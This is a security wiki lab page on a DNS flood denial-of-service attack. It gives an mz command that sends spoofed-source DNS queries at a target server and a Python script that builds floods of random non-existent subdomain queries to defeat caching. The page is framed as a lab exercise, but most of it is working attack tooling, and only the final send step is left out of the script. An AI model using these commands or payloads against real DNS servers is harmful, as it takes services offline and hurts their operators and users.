DNS Flood DDoS Attack Using Fake Domain Names
From the BGA Security Wiki
Purpose:
Using the mz tool to keep a DNS server busy with queries for fake domain names, so that the service is taken out of service.
Tool:
- Mz (Mausezahn)
Lab Scenario:
In this article the mz tool is used to generate the DNS packets. Detailed information on the parameters of the DNS packets that mz can generate is obtained as follows.
root@bt:~# mz -t dns help
Mausezahn 0.34.9 - (C) 2007-2009 by Herbert Haas - http://www.perihel.at/sec/mz/

 DNS type: Send Domain Name System Messages.

 Generally there are two interesting general DNS messages: queries and answers. The easiest
 way is to use the following syntax:

   query|q = <name>[:<type>] ............. where type is per default "A"
                                           (and class is always "IN")

   answer|a = [<type>:<ttl>:]<rdata> ...... ttl is per default 0.
            = [<type>:<ttl>:]<rdata>/[<type>:<ttl>:]<rdata>/...

 Note: If you only use the 'query' option then a query is sent. If you additonally add
 an 'answer' then an answer is sent.

 Examples:

   q = www.xyz.com
   q = www.xyz.com, a=192.168.1.10
   q = www.xyz.com, a=A:3600:192.168.1.10
   q = www.xyz.com, a=CNAME:3600:abc.com/A:3600:192.168.1.10

 Note: <type> can be: A, CNAME, or any integer

 OPTIONAL parameter hacks: (if you don't know what you do this might cause invalid packets)

   Parameter                    Description                                query / reply
   -------------------------------------------------------------------------------------
   request/response|reply ..... flag only                                  request / n.a.
   id ......................... packet id (0-65535)                        random / random
   opcode (or op) ............. accepts values 0..15 or one of             std / 0
                                these keywords:
     = std ................... Standard Query
     = inv ................... Inverse Query
     = sts ................... Server Status Request
   aa or !aa .................. Authoritative Answer                       UNSET / SET
   tc or !tc .................. Truncation                                 UNSET / UNSET
   rd or !rd .................. Recursion Desired                          SET / SET
   ra or !ra .................. Recursion Available                        UNSET / SET
   z .......................... Reserved (takes values 0..7)               0 / 0
                                (z=2...authenticated)
   rcode ...................... Response Code (0..15); interesting         0 / 0
                                values are:
     = 0 ...................... No Error Condition
     = 1 ...................... Unable to interprete query due to format error
     = 2 ...................... Unable to process due to server failure
     = 3 ...................... Name in query does not exist
     = 4 ...................... Type of query not supported
     = 5 ...................... Query refused

 Count values (values 0..65535) will be set automatically! You should not set these
 values manually except you are interested in invalid packets.

   qdcount (or qdc) ........... Number of entries in question section      1 / 1
   ancount (or anc) ........... Number of RRs in answer records section    0 / 1
   nscount (or nsc) ........... Number of name server RRs in authority     0 / 0
                                records section
   arcount (or arc) ........... Number of RRs in additional records section 0 / 0
The following run uses mz to send DNS queries to the target DNS server from a spoofed source address, so that the service is kept busy and pushed out of service. Here -A sets the (spoofed) source IP, -B the target DNS server, -t dns "q=..." the name to query, and -c the number of packets to send. Two points to keep in mind when reading the output: the rate mz prints (20000 packets per second below) is only its own send rate on the lab machine and says nothing about what the target actually processed, and because the source is spoofed the replies go to 5.5.5.5 rather than back to the sender, so the effect has to be measured on the target, not from the attacking host. Each packet carries a fresh random id (the mz default) but the same name; a flood of distinct, non-existent names, as in the title of this page, additionally prevents the server from answering out of its cache.
root@bt:~# mz -A 5.5.5.5 -B 1.2.39.40 -t dns "q=www.bga.com.tr" -c 1000
Mausezahn will send 1000 frames...
0.05 seconds (20000 packets per second)
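As an added example that is not part of the original page and not code from mz, the following Python builds the same kind of standard query mz produces (random id, QR=0, opcode=std, RD set, qdcount=1, the defaults in the parameter table above), but for a set of randomly generated names under one base zone, which is what the "fake domain names" of the title require, and decodes the header fields back so the layout can be checked. The base zone example.com, the 8-character label length and the function names are assumptions chosen for illustration; the code only constructs and parses packets and does not send anything.

```python
import random
import struct

# Constructed for this example: the zone the target server is authoritative for.
# "example.com" is an assumption, not a name taken from the page.
BASE_ZONE = "example.com"

QTYPE_A = 1     # record type A (mz's default query type)
QCLASS_IN = 1   # class IN (mz: "class is always IN")
OPCODE_STD = 0  # standard query (mz: opcode=std)


def random_label(length=8, rng=random):
    """Random lowercase label such as 'q7k2mz0a', used as a fake subdomain."""
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
    return "".join(rng.choice(alphabet) for _ in range(length))


def fake_names(base_zone, count, rng=random):
    """Return `count` distinct names under base_zone that are not expected to exist."""
    names = set()
    while len(names) < count:
        names.add(random_label(rng=rng) + "." + base_zone)
    return sorted(names)


def encode_name(name):
    """Wire-format a dotted name: one length byte per label, then a zero byte."""
    out = bytearray()
    for label in name.rstrip(".").split("."):
        data = label.encode("ascii")
        if not 1 <= len(data) <= 63:
            raise ValueError("label length must be 1..63: %r" % label)
        out.append(len(data))
        out += data
    out.append(0)
    return bytes(out)


def build_query(name, qtype=QTYPE_A, qid=None, rd=True, opcode=OPCODE_STD, rng=random):
    """Build a DNS query with the header defaults mz uses for queries:
    random id, QR=0, opcode=std, RD set, qdcount=1, all other counts 0."""
    if qid is None:
        qid = rng.randint(0, 65535)
    flags = (opcode & 0xF) << 11   # QR bit 15 stays 0 (query); opcode in bits 11..14
    if rd:
        flags |= 1 << 8            # RD: recursion desired
    header = struct.pack("!HHHHHH", qid, flags, 1, 0, 0, 0)
    question = encode_name(name) + struct.pack("!HH", qtype, QCLASS_IN)
    return header + question


def parse_query(packet):
    """Decode the header and first question of a DNS message (no compression
    pointers, which a plain query never contains) into a dict keyed like the
    mz parameter table."""
    qid, flags, qdcount, ancount, nscount, arcount = struct.unpack("!HHHHHH", packet[:12])
    labels, pos = [], 12
    while True:
        length = packet[pos]
        pos += 1
        if length == 0:
            break
        labels.append(packet[pos:pos + length].decode("ascii"))
        pos += length
    qtype, qclass = struct.unpack("!HH", packet[pos:pos + 4])
    return {
        "id": qid,
        "qr": (flags >> 15) & 1,
        "opcode": (flags >> 11) & 0xF,
        "rd": (flags >> 8) & 1,
        "rcode": flags & 0xF,
        "qdcount": qdcount, "ancount": ancount, "nscount": nscount, "arcount": arcount,
        "qname": ".".join(labels),
        "qtype": qtype,
        "qclass": qclass,
    }


def build_flood(base_zone=BASE_ZONE, count=1000, seed=None):
    """Payloads for a fake-name flood: every query names a different, non-existent
    subdomain, so the target cannot answer from cache. Sending them (one
    socket.sendto to UDP/53 per payload) is deliberately left out."""
    rng = random.Random(seed)
    return [build_query(n, rng=rng) for n in fake_names(base_zone, count, rng=rng)]


if __name__ == "__main__":
    for pkt in build_flood(count=3, seed=7):
        print(parse_query(pkt))
```

The only difference from the mz run above is the question name: mz repeats www.bga.com.tr a thousand times with a new id each time, whereas here every payload carries a different name under the base zone, so an authoritative server has to look each one up and a recursive resolver has to forward each one upstream. Decoding the packets with parse_query is also the quickest way to confirm, on a capture from the target, that the flags and counts on the wire match what the parameter table says a query should contain.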